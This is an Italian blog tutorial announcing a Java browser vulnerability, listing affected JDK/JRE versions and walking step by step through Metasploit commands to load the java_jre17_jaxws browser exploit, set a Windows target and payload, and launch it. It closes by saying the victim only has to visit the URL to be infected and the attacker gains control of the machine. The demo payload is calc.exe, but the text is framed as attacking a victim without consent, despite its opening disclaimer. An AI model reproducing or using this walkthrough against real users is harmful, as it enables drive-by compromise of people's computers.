Ciao ragazzi questo è il mio primo articolo sono Simonlab collaboratore del sito Blog.informaticalab.com, spero che i miei articoli siano sempre utili!
Cominciamo…..
Questo tutorial non vuole spingere nessuno ad effettuare danni verso altri! ma vuole solamente far conoscere eventuali falle di sicurezza, in questo caso vediamo Java!
Scoperta nuova vulnerabilità java!!!
l’ exploit ci permette di eseguire del codice sul pc della vittima senza il suo consenso.
Le versioni di java vulnerabili sono:
| Versioni: | Patch avviabili |
|---|---|
| JDK and JRE 7 Update 7 and earlier | Java SE |
| JDK and JRE 6 Update 35 and earlier | Java SE |
| JDK and JRE 5.0 Update 36 and earlier | Java SE |
| SDK and JRE 1.4.2_38 and earlier | Java SE |
| JavaFX 2.2 and earlier | JavaFX |
L’exploit è già disponibile su metasploit, facendo l’update potete già utilizzarlo 😉
Guida passo passo:
aprite il terminale è digitate:
sudo msfupdate (date invio) serve per aggiornare i database degli exploit!!
Poi avviate sempre da terminale metasploit:
sudo msfconsole (date invio)
Ora per utilizzare il seguente exploit digitate:
use exploit/multi/browser/java_jre17_jaxws (date invio)
impostiamo come obbiettivo windows:
set TARGET 1
ed impostiamo tutti i parametri neccessari all’attacco!
set PAYLOAD windows/exec
set CMD calc.exe
digitiamo infine:
exploit (date invio) serve per lanciare l'attacco...
Ora la vittima non dovrà far altro che visitare l’url per essere infettato, e noi avremo il controllo della sua macchina 😀
